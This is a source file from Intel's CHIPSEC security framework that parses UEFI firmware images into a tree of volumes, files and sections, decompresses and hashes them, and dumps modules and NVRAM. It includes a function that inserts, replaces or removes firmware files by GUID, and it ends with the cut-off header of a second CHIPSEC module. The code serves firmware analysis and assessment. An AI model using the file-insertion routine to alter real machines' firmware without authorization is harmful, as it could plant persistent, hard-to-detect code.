# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
#
# -------------------------------------------------------------------------------

"""
UEFI firmware image parsing and manipulation functionality

usage:
    >>> parse_uefi_region_from_file(_uefi, filename, fwtype, outpath):
"""

import os
import struct
import random
import json
import string
from collections.abc import Callable
from uuid import UUID
from typing import Dict, List, Optional, Union, Any, TYPE_CHECKING
if TYPE_CHECKING:
    from chipsec.hal.uefi_fv import EFI_MODULE
from chipsec.library.logger import logger
from chipsec.library.file import write_file, read_file
from chipsec.hal.uefi_compression import COMPRESSION_TYPE_LZMA, COMPRESSION_TYPE_EFI_STANDARD, COMPRESSION_TYPES_ALGORITHMS, COMPRESSION_TYPE_UNKNOWN, COMPRESSION_TYPE_LZMAF86
from chipsec.hal.uefi_common import bit_set, EFI_GUID_SIZE, EFI_GUID_FMT
from chipsec.hal.uefi_platform import FWType, fw_types, EFI_NVRAM_GUIDS, EFI_PLATFORM_FS_GUIDS, NVAR_NVRAM_FS_FILE
from chipsec.hal.uefi import identify_EFI_NVRAM, parse_EFI_variables
from chipsec.hal.uefi_fv import EFI_SECTION_PE32, EFI_SECTION_TE, EFI_SECTION_PIC, EFI_SECTION_COMPATIBILITY16, EFI_FIRMWARE_FILE_SYSTEM2_GUID
from chipsec.hal.uefi_fv import EFI_FIRMWARE_FILE_SYSTEM_GUID, EFI_SECTIONS_EXE, EFI_SECTION_USER_INTERFACE, EFI_SECTION_GUID_DEFINED
from chipsec.hal.uefi_fv import EFI_GUID_DEFINED_SECTION, EFI_GUID_DEFINED_SECTION_size, NextFwFile, NextFwFileSection, NextFwVolume, GetFvHeader
from chipsec.hal.uefi_fv import EFI_CRC32_GUIDED_SECTION_EXTRACTION_PROTOCOL_GUID
from chipsec.hal.uefi_fv import EFI_CERT_TYPE_RSA_2048_SHA256_GUID, EFI_CERT_TYPE_RSA_2048_SHA256_GUID_size, EFI_SECTION, EFI_FV, EFI_FILE
from chipsec.hal.uefi_fv import EFI_FIRMWARE_CONTENTS_SIGNED_GUID, WIN_CERT_TYPE_EFI_GUID, WIN_CERTIFICATE_size, WIN_CERTIFICATE
from chipsec.hal.uefi_fv import EFI_SECTION_COMPRESSION, EFI_SECTION_FIRMWARE_VOLUME_IMAGE, EFI_SECTION_RAW, SECTION_NAMES, DEF_INDENT
from chipsec.hal.uefi_fv import FILE_TYPE_NAMES, EFI_FS_GUIDS, EFI_FILE_HEADER_INVALID, EFI_FILE_HEADER_VALID, EFI_FILE_HEADER_CONSTRUCTION
from chipsec.hal.uefi_fv import EFI_COMPRESSION_SECTION_size, EFI_FV_FILETYPE_ALL, EFI_FV_FILETYPE_FFS_PAD, EFI_FVB2_ERASE_POLARITY, EFI_FV_FILETYPE_RAW
from chipsec.hal.uefi_fv import EFI_GUIDED_SECTION_TIANO, EFI_GUIDED_SECTION_BROTLI, EFI_GUIDED_SECTION_LZMAF86
from chipsec.hal.uefi_fv import EFI_GUIDED_SECTION_LZMA, EFI_GUIDED_SECTION_LZMA_HP, EFI_GUIDED_SECTION_LZMA_MS
from chipsec.hal.uefi_fv import EFI_GUIDED_SECTION_GZIP, EFI_GUIDED_SECTION_ZLIB_AMD1, EFI_GUIDED_SECTION_ZLIB_AMD2
from chipsec.hal.uefi_compression import COMPRESSION_TYPE_BROTLI, COMPRESSION_TYPE_GZIP, COMPRESSION_TYPE_ZLIB_AMD
from chipsec.hal.uefi_compression import UefiCompression

CMD_UEFI_FILE_REMOVE = 0
CMD_UEFI_FILE_INSERT_BEFORE = 1
CMD_UEFI_FILE_INSERT_AFTER = 2
CMD_UEFI_FILE_REPLACE = 3

type2ext = {EFI_SECTION_PE32: 'pe32', EFI_SECTION_TE: 'te', EFI_SECTION_PIC: 'pic', EFI_SECTION_COMPATIBILITY16: 'c16'}

#
# Calculate hashes for all FVs, FW files and sections (PE/COFF or TE executables)
# and write them on the file system
#
WRITE_ALL_HASHES = False


def decompress_section_data(section_dir_path: str, sec_fs_name: str, compressed_data: bytes, compression_type: int) -> bytes:
    uefi_uc = UefiCompression()
    uncompressed_name = os.path.join(section_dir_path, sec_fs_name)
    logger().log_hal(f'[uefi] Decompressing EFI binary (type = 0x{compression_type:X})\n       {uncompressed_name} ->\n')
    uncompressed_image = uefi_uc.decompress_efi_binary(compressed_data, compression_type)
    return uncompressed_image


def compress_image(image: bytes, compression_type: int) -> bytes:
    uefi_uc = UefiCompression()
    logger().log_hal(f'[uefi] Compressing EFI binary (type = 0x{compression_type:X})\n')
    compressed_image = uefi_uc.compress_efi_binary(image, compression_type)
    return compressed_image


def modify_uefi_region(data: bytes, command: int, guid: UUID, uefi_file: bytes = b'') -> bytes:
    FvEndOffset = 0  # Default
    fv = NextFwVolume(data)
    while fv is not None:
        FvLengthChange = 0
        polarity = bit_set(fv.Attributes, EFI_FVB2_ERASE_POLARITY)
        if ((fv.Guid == EFI_FIRMWARE_FILE_SYSTEM2_GUID) or (fv.Guid == EFI_FIRMWARE_FILE_SYSTEM_GUID)):
            fwbin = NextFwFile(fv.Image, fv.Size, fv.HeaderSize, polarity)
            while fwbin is not None:
                next_offset = fwbin.Size + fwbin.Offset
                if (fwbin.Guid == guid):
                    uefi_file_size = (len(uefi_file) + 7) & 0xFFFFFFF8
                    CurFileOffset = fv.Offset + fwbin.Offset + FvLengthChange
                    NxtFileOffset = fv.Offset + next_offset + FvLengthChange
                    if command == CMD_UEFI_FILE_REMOVE:
                        FvLengthChange -= (next_offset - fwbin.Offset)
                        logger().log(f'Removing UEFI file with GUID={fwbin.Guid} at offset={CurFileOffset:08X}, size change: {FvLengthChange:d} bytes')
                        data = data[:CurFileOffset] + data[NxtFileOffset:]
                    elif command == CMD_UEFI_FILE_INSERT_BEFORE:
                        FvLengthChange += uefi_file_size
                        logger().log(f'Inserting UEFI file before file with GUID={fwbin.Guid} at offset={CurFileOffset:08X}, size change: {FvLengthChange:d} bytes')
                        data = data[:CurFileOffset] + uefi_file.ljust(uefi_file_size, b'\xFF') + data[CurFileOffset:]
                    elif command == CMD_UEFI_FILE_INSERT_AFTER:
                        FvLengthChange += uefi_file_size
                        logger().log(f'Inserting UEFI file after file with GUID={fwbin.Guid} at offset={CurFileOffset:08X}, size change: {FvLengthChange:d} bytes')
                        data = data[:NxtFileOffset] + uefi_file.ljust(uefi_file_size, b'\xFF') + data[NxtFileOffset:]
                    elif command == CMD_UEFI_FILE_REPLACE:
                        FvLengthChange += uefi_file_size - (next_offset - fwbin.Offset)
                        logger().log(f'Replacing UEFI file with GUID={fwbin.Guid} at offset={CurFileOffset:08X}, new size: {len(uefi_file):d}, old size: {fwbin.Size:d}, size change: {FvLengthChange:d} bytes')
                        data = data[:CurFileOffset] + uefi_file.ljust(uefi_file_size, b'\xFF') + data[NxtFileOffset:]
                    else:
                        raise Exception('Invalid command')
                if next_offset - fwbin.Offset >= 24:
                    FvEndOffset = fv.Offset + next_offset + FvLengthChange

                fwbin = NextFwFile(fv.Image, fv.Size, next_offset, polarity)
            if FvEndOffset == 0:
                logger().log_hal(f'Using FvEndOffset = 0')
            if FvLengthChange >= 0:
                data = data[:FvEndOffset] + data[FvEndOffset + FvLengthChange:]
            else:
                data = data[:FvEndOffset] + (abs(FvLengthChange) * b'\xFF') + data[FvEndOffset:]

            FvLengthChange = 0

            # if FvLengthChange != 0:
            #    logger().log( "Rebuilding Firmware Volume with GUID={} at offset={:08X}".format(FsGuid, FvOffset) )
            #    FvHeader = data[FvOffset: FvOffset + FvHeaderLength]
            #    FvHeader = FvHeader[:0x20] + struct.pack('<Q', FvLength) + FvHeader[0x28:]
            #    NewChecksum = FvChecksum16(FvHeader[:0x32] + '\x00\x00' + FvHeader[0x34:])
            #    FvHeader = FvHeader[:0x32] + struct.pack('<H', NewChecksum) + FvHeader[0x34:]
            #    data = data[:FvOffset] + FvHeader + data[FvOffset + FvHeaderLength:]

        fv = NextFwVolume(data, fv.Offset, fv.Size)
    return data


def build_efi_modules_tree(fwtype: Optional[str], data: bytes, Size: int, offset: int, polarity: bool) -> List[EFI_SECTION]:
    sections: List[EFI_SECTION] = []
    secn = 0

    sec = NextFwFileSection(data, Size, offset, polarity)
    while sec is not None:
        # pick random file name in case dumpall=False - we'll need it to decompress the section
        file_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(4))
        sec_fs_name = f'sect{secn:02d}_{file_name}'

        if sec.Type in EFI_SECTIONS_EXE:
            # "leaf" executable section: update hashes and check against match criteria
            sec.calc_hashes(sec.HeaderSize)
        elif sec.Type == EFI_SECTION_USER_INTERFACE:
            # "leaf" UI section: update section's UI name
            try:
                sec.ui_string = sec.Image[sec.HeaderSize:-2].decode("utf-16")
            except UnicodeDecodeError:
                pass
        elif sec.Type == EFI_SECTION_GUID_DEFINED:
            if len(sec.Image) < sec.HeaderSize + EFI_GUID_DEFINED_SECTION_size:
                logger().log_warning("EFI Section seems to be malformed")
                if len(sec.Image) < sec.HeaderSize + EFI_GUID_SIZE:
                    logger().log_warning("Creating fake GUID of 0000-00-00-0000000")
                    guid0 = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                else:
                    guid0 = struct.unpack(EFI_GUID_FMT, sec.Image[sec.HeaderSize:sec.HeaderSize + EFI_GUID_SIZE])[0]
                    sec.DataOffset = len(sec.Image) - 1
            else:
                guid0, sec.DataOffset, sec.Attributes = struct.unpack(EFI_GUID_DEFINED_SECTION, sec.Image[sec.HeaderSize:sec.HeaderSize + EFI_GUID_DEFINED_SECTION_size])
            if not isinstance(guid0, bytes):
                logger().log_warning("GUID is corrupted")
                logger().log_warning("Creating fake GUID of 0000-00-00-0000000")
                guid0 = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

            sec.Guid = UUID(bytes_le=guid0)

            if sec.Guid == EFI_CRC32_GUIDED_SECTION_EXTRACTION_PROTOCOL_GUID:
                sec.children = build_efi_modules_tree(fwtype, sec.Image[sec.DataOffset:], Size - sec.DataOffset, 0, polarity)
            elif sec.Guid in [EFI_GUIDED_SECTION_LZMA, EFI_GUIDED_SECTION_LZMA_HP, EFI_GUIDED_SECTION_LZMA_MS,
                              EFI_GUIDED_SECTION_LZMAF86, EFI_GUIDED_SECTION_BROTLI, EFI_GUIDED_SECTION_GZIP,
                              EFI_GUIDED_SECTION_ZLIB_AMD1, EFI_GUIDED_SECTION_ZLIB_AMD2, EFI_GUIDED_SECTION_TIANO]:
                if sec.Guid in [EFI_GUIDED_SECTION_LZMA, EFI_GUIDED_SECTION_LZMA_HP, EFI_GUIDED_SECTION_LZMA_MS]:
                    d = decompress_section_data("", sec_fs_name, sec.Image[sec.DataOffset:], COMPRESSION_TYPE_LZMA)
                elif sec.Guid == EFI_GUIDED_SECTION_LZMAF86:
                    d = decompress_section_data("", sec_fs_name, sec.Image[sec.DataOffset:], COMPRESSION_TYPE_LZMAF86)
                elif sec.Guid == EFI_GUIDED_SECTION_BROTLI:
                    d = decompress_section_data("", sec_fs_name, sec.Image[sec.DataOffset:], COMPRESSION_TYPE_BROTLI)
                elif sec.Guid == EFI_GUIDED_SECTION_GZIP:
                    d = decompress_section_data("", sec_fs_name, sec.Image[sec.DataOffset:], COMPRESSION_TYPE_GZIP)
                elif sec.Guid in [EFI_GUIDED_SECTION_ZLIB_AMD1, EFI_GUIDED_SECTION_ZLIB_AMD2]:
                    d = decompress_section_data("", sec_fs_name, sec.Image[sec.DataOffset:], COMPRESSION_TYPE_ZLIB_AMD)
                elif sec.Guid == EFI_GUIDED_SECTION_TIANO:
                    d = decompress_section_data("", sec_fs_name, sec.Image[sec.DataOffset:], COMPRESSION_TYPE_EFI_STANDARD)
                else:
                    d = b''

                if not d:
                    sec.Comments = "Unable to decompress image"

                    d = decompress_section_data("", sec_fs_name, sec.Image[sec.HeaderSize + EFI_GUID_DEFINED_SECTION_size:], COMPRESSION_TYPE_UNKNOWN)

                if d:
                    sec.children = build_efi_modules_tree(fwtype, d, len(d), 0, polarity)
            elif sec.Guid == EFI_CERT_TYPE_RSA_2048_SHA256_GUID:
                offset = sec.DataOffset + EFI_CERT_TYPE_RSA_2048_SHA256_GUID_size
                sec.Comments = "Certificate Type RSA2048/SHA256"
                if len(sec.Image) > offset:
                    sec.children = build_efi_modules_tree(fwtype, sec.Image[offset:], len(sec.Image[offset:]), 0, polarity)
            elif sec.Guid == EFI_FIRMWARE_CONTENTS_SIGNED_GUID:
                start = sec.HeaderSize + EFI_GUID_DEFINED_SECTION_size
                stop = start + WIN_CERTIFICATE_size
                length, _, cert_type, guid = struct.unpack(WIN_CERTIFICATE, sec.Image[start:stop])
                certGuid = UUID(bytes_le=guid)
                if cert_type == WIN_CERT_TYPE_EFI_GUID:
                    sec.Comments = "Found UEFI Certificate."
                    if certGuid == EFI_CERT_TYPE_RSA_2048_SHA256_GUID:
                        sec.Comments += " Cert of type RSA2048/SHA256!"
                    else:
                        sec.Comments += f" Cert of unknown type! But the guid is: {certGuid}"
                else:
                    sec.Comments = f"Unknown cert type: {cert_type}"
                offset = sec.DataOffset + length
                if len(sec.Image) > offset:
                    sec.children = build_efi_modules_tree(fwtype, sec.Image[offset:], len(sec.Image[offset:]), 0, polarity)
            else:
                sec.children = build_efi_model(sec.Image[sec.HeaderSize:], fwtype)

        elif sec.Type == EFI_SECTION_COMPRESSION:
            for mct in COMPRESSION_TYPES_ALGORITHMS:
                d = decompress_section_data("", sec_fs_name, sec.Image[sec.HeaderSize + EFI_COMPRESSION_SECTION_size:], mct)
                if d:
                    sec.children = build_efi_modules_tree(fwtype, d, len(d), 0, polarity)
                if sec.children:
                    break

        elif sec.Type == EFI_SECTION_FIRMWARE_VOLUME_IMAGE:
            children = build_efi_file_tree(sec.Image[sec.HeaderSize:], fwtype)
            if children is not None:
                sec.children = children

        elif sec.Type == EFI_SECTION_RAW:
            sec.children = build_efi_model(sec.Image[sec.HeaderSize:], fwtype)

        elif sec.Type not in SECTION_NAMES.keys():
            sec.children = build_efi_model(sec.Image[sec.HeaderSize:], fwtype)
            if not sec.children:
                sec.children = build_efi_model(data, fwtype)

        sections.append(sec)
        sec = NextFwFileSection(data, Size, sec.Size + sec.Offset, polarity)
        secn += 1
    return sections


#
# build_efi_file_tree - extract EFI FV file from EFI image and build an object tree
#
# Input arguements:
# fv_image - fv_image containing files
# fwtype - platform specific firmware type used to detect NVRAM format (VSS, EVSA, NVAR...)
def build_efi_file_tree(fv_img: bytes, fwtype: Optional[str]) -> List[EFI_FILE]:
    fv_size, HeaderSize, Attributes = GetFvHeader(fv_img)
    polarity = bool(Attributes & EFI_FVB2_ERASE_POLARITY)
    fwbin = NextFwFile(fv_img, fv_size, HeaderSize, polarity)
    fv = []
    padding = 0
    while fwbin is not None:
        fw_offset = fwbin.Size + fwbin.Offset
        fwbin.calc_hashes()
        if padding < fwbin.Offset:
            non_UEFI = EFI_SECTION(padding, 'Non-UEFI_Padding', EFI_FV_FILETYPE_FFS_PAD,
                                   fv_img[padding:fw_offset - 1], 0, fwbin.Offset - padding)
            non_UEFI.Comments = 'Attempting to identify modules in non-UEFI Padding Section'
            non_UEFI.children = find_efi_modules(data=fv_img[padding:fwbin.Offset - 1], fwtype=fwtype, polarity=polarity)
            if non_UEFI.children:
                fv.append(non_UEFI)
        padding = fw_offset
        if fwbin.Type not in (EFI_FV_FILETYPE_ALL, EFI_FV_FILETYPE_RAW, EFI_FV_FILETYPE_FFS_PAD):
            fwbin.children = find_efi_modules(data=fwbin.Image, fwtype=fwtype, polarity=polarity,
                                              data_start=fwbin.HeaderSize)
            fv.append(fwbin)
        elif fwbin.Type == EFI_FV_FILETYPE_RAW:
            if fwbin.Name != NVAR_NVRAM_FS_FILE:
                fwbin.children = find_efi_modules(data=fwbin.Image, fwtype=fwtype, polarity=polarity,
                                                  data_size=fwbin.Size, data_start=fwbin.HeaderSize)
                fv.append(fwbin)
            else:
                fwbin.isNVRAM = True
                fwbin.NVRAMType = FWType.EFI_FW_TYPE_NVAR
                fv.append(fwbin)
        elif fwbin.Type == EFI_FV_FILETYPE_FFS_PAD:
            non_UEFI = EFI_SECTION(fwbin.Offset, 'Padding', fwbin.Type, fv_img[fw_offset:], 0, fwbin.Size)
            non_UEFI.Comments = 'Attempting to identify modules in Padding Section'
            non_UEFI.children = find_efi_modules(data=fwbin.Image, fwtype=fwtype, polarity=polarity)
            if non_UEFI.children:
                fv.append(non_UEFI)
        elif fwbin.State not in (EFI_FILE_HEADER_CONSTRUCTION, EFI_FILE_HEADER_INVALID, EFI_FILE_HEADER_VALID):
            fwbin.children = find_efi_modules(data=fwbin.Image, fwtype=fwtype, polarity=polarity,
                                              data_size=fwbin.Size, data_start=fwbin.HeaderSize)
            fv.append(fwbin)
        fwbin = NextFwFile(fv_img, fv_size, fw_offset, polarity)
        if fwbin is None and fv_size > fw_offset:
            non_UEFI = EFI_SECTION(fw_offset, 'Non-UEFI_Data', 0xFF, fv_img[fw_offset:], 0, fv_size - fw_offset)
            non_UEFI.Comments = 'Attempting to identify modules in non-UEFI Data Section'
            non_UEFI.children = find_efi_modules(data=fv_img[fw_offset:], fwtype=fwtype, polarity=polarity)
            if non_UEFI.children:
                fv.append(non_UEFI)
    return fv


#
# build_efi_tree - extract EFI modules (FV, files, sections) from EFI image and build an object tree
#
# Input arguments:
#   data           - an image containing UEFI firmware volumes
#   fwtype         - platform specific firmware type used to detect NVRAM format (VSS, EVSA, NVAR...)
#
def build_efi_tree(data: bytes, fwtype: Optional[str]) -> List['EFI_MODULE']:
    fvolumes = []
    fv = NextFwVolume(data)
    while fv is not None:
        fv.calc_hashes()

        # Detect File System firmware volumes
        if fv.Guid in EFI_PLATFORM_FS_GUIDS or fv.Guid in EFI_FS_GUIDS:
            fwbin = build_efi_file_tree(fv.Image, fwtype)
            for i in fwbin:
                fv.children.append(i)

        # Detect NVRAM firmware volumes
        elif fv.Guid in EFI_NVRAM_GUIDS:  # == VARIABLE_STORE_FV_GUID:
            fv.isNVRAM = True
            try:
                fv.NVRAMType = identify_EFI_NVRAM(fv.Image) if fwtype is None else fwtype
            except Exception:
                logger().log_warning(f"Couldn't identify NVRAM in FV {{{fv.Guid}}}")
            fwbin = build_efi_file_tree(fv.Image, fwtype)
            for i in fwbin:
                fv.children.append(i)

        fvolumes.append(fv)
        fv = NextFwVolume(data, fv.Offset, fv.Size)

    return fvolumes


#
# Attempt to find EFI modules by calling build_efi_tree (FV), build_efi_file_tree (FILE),
# and build_efi_modules_tree (SECTION), in succession. Stop on first successful call,
# unless the environment variable CHIPSEC_HAL_FIND_EFI_MODULES_BRUTE_FORCE is defined.
#
def find_efi_modules(data: bytes, fwtype: Optional[str], polarity: bool, data_size: Optional[int] = None,
                     data_start: Optional[int] = None) -> List['EFI_MODULE']:
    data_len: int = len(data) if data_size is None else data_size
    data_off: int = 0 if data_start is None else data_start
    brute_force: str = os.environ.get('CHIPSEC_HAL_FIND_EFI_MODULES_BRUTE_FORCE', '')

    efi_tree: List['EFI_MODULE'] = build_efi_tree(data=data[data_off:data_len], fwtype=fwtype)

    if not efi_tree or brute_force:
        efi_tree += build_efi_file_tree(fv_img=data[data_off:data_len], fwtype=fwtype)

    if not efi_tree or brute_force:
        efi_tree += build_efi_modules_tree(fwtype=fwtype, data=data, Size=data_len, offset=data_off, polarity=polarity)

    return efi_tree


#
# update_efi_tree propagates EFI file's GUID down to all sections and
# UI_string from the corresponding section, if found, up to the EFI file at the same time
# File GUID and UI string are then used when searching for EFI files and executable sections
#
def update_efi_tree(modules: List['EFI_MODULE'], parent_guid: Optional[UUID] = None) -> str:
    ui_string = ''
    for m in modules:
        if type(m) == EFI_FILE:
            parent_guid = m.Guid
        elif type(m) == EFI_SECTION:
            # if it's a section update its parent file's GUID
            m.parentGuid = parent_guid
            if m.Type == EFI_SECTION_USER_INTERFACE:
                # if UI section (leaf), update ui_string in sibling sections including in PE/TE,
                # and propagate it up until and including parent EFI file
                for m1 in modules:
                    m1.ui_string = m.ui_string
                ui_string = m.ui_string
        # update parent file's GUID in all children nodes
        if len(m.children) > 0:
            ui_string = update_efi_tree(m.children, parent_guid)
            # if it's a EFI file then update its ui_string with ui_string extracted from UI section
            if ui_string and (type(m) in (EFI_FILE, EFI_SECTION)):
                m.ui_string = ui_string
                if (type(m) == EFI_FILE):
                    ui_string = ''
    return ui_string


def build_efi_model(data: bytes, fwtype: Optional[str]) -> List['EFI_MODULE']:
    model = build_efi_tree(data, fwtype)
    update_efi_tree(model)
    return model


def FILENAME(mod: Union[EFI_FILE, EFI_SECTION], parent: Optional['EFI_MODULE'], modn: int) -> str:
    fname = f'{modn:02d}_{mod.Guid}'
    if type(mod) == EFI_FILE:
        type_s = FILE_TYPE_NAMES[mod.Type] if mod.Type in FILE_TYPE_NAMES.keys() else f'UNKNOWN_{mod.Type:02X}'
        fname = f'{fname}.{type_s}'
    elif type(mod) == EFI_SECTION:
        fname = f'{modn:02d}_{mod.Name}'
        if mod.Type in EFI_SECTIONS_EXE:
            if (parent is not None) and parent.ui_string:
                if (parent.ui_string.endswith(".efi")):
                    fname = parent.ui_string
                else:
                    fname = f'{parent.ui_string}.efi'
            else:
                fname = f'{fname}.{type2ext[mod.Type]}'
    return fname


def dump_efi_module(mod, parent: Optional['EFI_MODULE'], modn: int, path: str) -> str:
    fname = FILENAME(mod, parent, modn)
    mod_path = os.path.join(path, fname)
    write_file(mod_path, mod.Image[mod.HeaderSize:] if type(mod) == EFI_SECTION else mod.Image)
    if type(mod) == EFI_SECTION or WRITE_ALL_HASHES:
        if mod.MD5:
            write_file(f'{mod_path}.md5', mod.MD5)
        if mod.SHA1:
            write_file(f'{mod_path}.sha1', mod.SHA1)
        if mod.SHA256:
            write_file(f'{mod_path}.sha256', mod.SHA256)
    return mod_path


class EFIModuleType:
    SECTION_EXE = 1
    SECTION = 2
    FV = 4
    FILE = 8
    ALL = 15


def search_efi_tree(modules: List['EFI_MODULE'],
                    search_callback: Optional[Callable],
                    match_module_types: int = EFIModuleType.SECTION_EXE,
                    findall: bool = True
                    ) -> List['EFI_MODULE']:
    matching_modules = []
    for module in modules:
        if search_callback is not None:
            if ((match_module_types & EFIModuleType.SECTION == EFIModuleType.SECTION) and type(module) == EFI_SECTION) or \
               ((match_module_types & EFIModuleType.SECTION_EXE == EFIModuleType.SECTION_EXE) and (type(module) == EFI_SECTION and module.Type in EFI_SECTIONS_EXE)) or \
               ((match_module_types & EFIModuleType.FV == EFIModuleType.FV) and type(module) == EFI_FV) or \
               ((match_module_types & EFIModuleType.FILE == EFIModuleType.FILE) and type(module) == EFI_FILE):
                if search_callback(module):
                    matching_modules.append(module)
                    if not findall:
                        return [module]

        # recurse search if current module node has children nodes
        if len(module.children) > 0:
            matches = search_efi_tree(module.children, search_callback, match_module_types, findall)
            if len(matches) > 0:
                matching_modules.extend(matches)
                if not findall:
                    return [module]

    return matching_modules


def save_efi_tree(modules: List['EFI_MODULE'],
                  parent: Optional['EFI_MODULE'] = None,
                  save_modules: bool = True,
                  path: str = '',
                  save_log: bool = True,
                  lvl: int = 0
                  ) -> List[Dict[str, Any]]:
    mod_dir_path = ''
    modules_arr = []
    modn = 0
    for m in modules:
        md: Dict[str, Any] = {}
        m.indent = DEF_INDENT * lvl
        if save_log:
            logger().log(str(m))

        # extract all non-function non-None members of EFI_MODULE objects
        attrs = [a for a in dir(m) if not callable(getattr(m, a)) and not a.startswith("__") and (getattr(m, a) is not None)]
        for a in attrs:
            md[a] = getattr(m, a)
        md["class"] = type(m).__name__
        # remove extra attributes
        for f in ["Image", "indent"]:
            del md[f]

        # save EFI module image, make sub-directory for children
        if save_modules:
            mod_path = dump_efi_module(m, parent, modn, path)
            try:
                md["file_path"] = os.path.relpath(mod_path[4:] if mod_path.startswith("\\\\?\\") else mod_path)
            except Exception:
                md["file_path"] = mod_path.split(os.sep)[-1]
            if m.isNVRAM or len(m.children) > 0:
                mod_dir_path = f'{mod_path}.dir'
                if not os.path.exists(mod_dir_path):
                    os.makedirs(mod_dir_path)
                if m.isNVRAM:
                    try:
                        if m.NVRAMType and (parent is not None):
                            # @TODO: technically, NVRAM image should be m.Image but
                            # getNVstore_xxx functions expect FV than a FW file within FV
                            # so for EFI_FILE type of module using parent's Image as NVRAM
                            nvram = parent.Image if (type(m) == EFI_FILE and type(parent) == EFI_FV) else m.Image
                            file_path = os.path.join(mod_dir_path, 'NVRAM')
                            parse_EFI_variables(file_path, nvram, False, m.NVRAMType)
                        else:
                            raise Exception("NVRAM type cannot be None")
                    except Exception:
                        logger().log_warning(f"Couldn't extract NVRAM in {{{m.Guid}}} using type '{m.NVRAMType}'")

        # save children modules
        if len(m.children) > 0:
            md["children"] = save_efi_tree(m.children, m, save_modules, mod_dir_path, save_log, lvl + 1)
        else:
            del md["children"]

        modules_arr.append(md)
        modn += 1

    return modules_arr


class UUIDEncoder(json.JSONEncoder):
    def default(self, obj: Any):
        if isinstance(obj, UUID):
            return str(obj).upper()
        return json.JSONEncoder.default(self, obj)


def parse_uefi_region_from_file(filename: str, fwtype: Optional[str], outpath: Optional[str] = None, filetype: List[int] = []) -> None:
    # Create an output folder to dump EFI module tree
    if outpath is None:
        outpath = f'{filename}.dir'
    if not os.path.exists(outpath):
        os.makedirs(outpath)

    # Read UEFI image binary to parse
    rom = read_file(filename)

    # Parse UEFI image binary and build a tree hierarchy of EFI modules
    tree = build_efi_model(rom, fwtype)

    # Save entire EFI module hierarchy on a file-system and export into JSON
    if filetype:
        tree_json = save_efi_tree_filetype(tree, path=outpath, filetype=filetype)
    else:
        tree_json = save_efi_tree(tree, path=outpath)
    write_file(f'{filename}.UEFI.json', json.dumps(tree_json, indent=2, separators=(',', ': '), cls=UUIDEncoder))


def decode_uefi_region(pth: str, fname: str, fwtype: Optional[str], filetype: List[int] = []) -> None:

    bios_pth = os.path.join(pth, f'{fname}.dir')
    if not os.path.exists(bios_pth):
        os.makedirs(bios_pth)
    fv_pth = os.path.join(bios_pth, 'FV')
    if not os.path.exists(fv_pth):
        os.makedirs(fv_pth)

    # Decoding UEFI Firmware Volumes
    logger().log_hal("[spi_uefi] Decoding UEFI firmware volumes...")
    parse_uefi_region_from_file(fname, fwtype, fv_pth, filetype)
    # If a specific filetype is wanted, there is no need to check for EFI Variables
    if filetype:
        return

    # Decoding EFI Variables NVRAM
    logger().log_hal("[spi_uefi] Decoding UEFI NVRAM...")
    region_data = read_file(fname)
    if fwtype is None:
        fwtype = identify_EFI_NVRAM(region_data)
        if fwtype is None:
            return
    elif fwtype not in fw_types:
        if logger().HAL:
            logger().log_error(f'Unrecognized NVRAM type {fwtype}')
        return
    nvram_fname = os.path.join(bios_pth, (f'nvram_{fwtype}'))
    logger().set_log_file(f'{nvram_fname}.nvram.lst', False)
    parse_EFI_variables(nvram_fname, region_data, False, fwtype)


def save_efi_tree_filetype(modules: List['EFI_MODULE'],
                           parent: Optional['EFI_MODULE'] = None,
                           path: str = '',
                           lvl: int = 0,
                           filetype: List[int] = [],
                           save: bool = True
                           ) -> List[Dict[str, Any]]:
    mod_dir_path = path
    modules_arr = []
    modn = 0
    for m in modules:
        md: Dict[str, Any] = {}
        m.indent = DEF_INDENT * lvl
        if (isinstance(m, EFI_FILE) and m.Type in filetype) and save:
            logger().log(str(m))

        # extract all non-function non-None members of EFI_MODULE objects
        attrs = [a for a in dir(m) if not callable(getattr(m, a)) and not a.startswith("__") and (getattr(m, a) is not None)]
        for a in attrs:
            md[a] = getattr(m, a)
        md["class"] = type(m).__name__
        # remove extra attributes
        for f in ["Image", "indent"]:
            del md[f]

        # save EFI module image, make sub-directory for children
        if (isinstance(m, EFI_FILE) and m.Type in filetype) or save:
            mod_path = dump_efi_module(m, parent, modn, path)
            try:
                md["file_path"] = os.path.relpath(mod_path[4:] if mod_path.startswith("\\\\?\\") else mod_path)
            except Exception:
                md["file_path"] = mod_path.split(os.sep)[-1]
            if m.isNVRAM or len(m.children) > 0:
                mod_dir_path = f'{mod_path}.dir'
                if not os.path.exists(mod_dir_path):
                    os.makedirs(mod_dir_path)
        # save children modules
        if len(m.children) > 0:
            md["children"] = save_efi_tree_filetype(m.children, m, mod_dir_path, lvl + 1, filetype, save)
        else:
            del md["children"]

        modules_arr.append(md)
        modn += 1

    return modules_arr



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2020, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
Checks for BIOS Interface Lock including Top Swap Mode

References:
    - `BIOS Boot Hijacking and VMware Vulnerabilities Digging <http://powerofcommunity.net/poc2007/sunbing.pdf>`_ by Bing Sun

Usage:
